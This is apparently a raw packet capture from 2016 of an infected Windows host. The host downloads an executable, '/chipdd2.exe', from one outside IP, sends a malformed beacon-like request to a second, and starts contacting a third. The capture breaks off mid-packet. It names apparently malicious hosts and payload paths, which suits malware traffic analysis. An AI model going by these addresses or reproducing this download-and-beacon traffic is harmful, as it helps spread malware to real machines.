2016-10-23 00:41:27.456904 IP 192.168.1.102.58685 > 176.103.55.73.80: Flags [P.], seq 0:287, ack 1, win 256, length 287: HTTP: GET /chipdd2.exe HTTP/1.1
E..Gh%@……..f.g7I.=.P..)…..P…….GET /chipdd2.exe HTTP/1.1
Accept: application/x-shockwave-flash, image/gif, image/jpeg, image/pjpeg, */*
Accept-Language: en-us
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0)
Accept-Encoding: gzip, deflate
Host: 176.103.55.73
Connection: Keep-Alive
—
E..(sm@……..f.r…G.P`;`..LE.P…G………
2016-10-23 00:41:43.947220 IP 192.168.1.102.58700 > 176.114.17.14.80: Flags [P.], seq 0:157, ack 1, win 258, length 157: HTTP: GET /file.htm HTTP/1.1
E…sn@….6…f.r…L.P.|’Y0..pP….[..GET /file.htm HTTP/1.1
Host: 176.114.17.14
Content-Length: 164
User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:2.0) Gecko/20100101 Firefox/4.0 Opera 12.14
2016-10-23 00:41:44.101474 IP 192.168.1.102.58698 > 210.92.190.183.80: Flags [S], seq 3229876503, win 8192, options [mss […]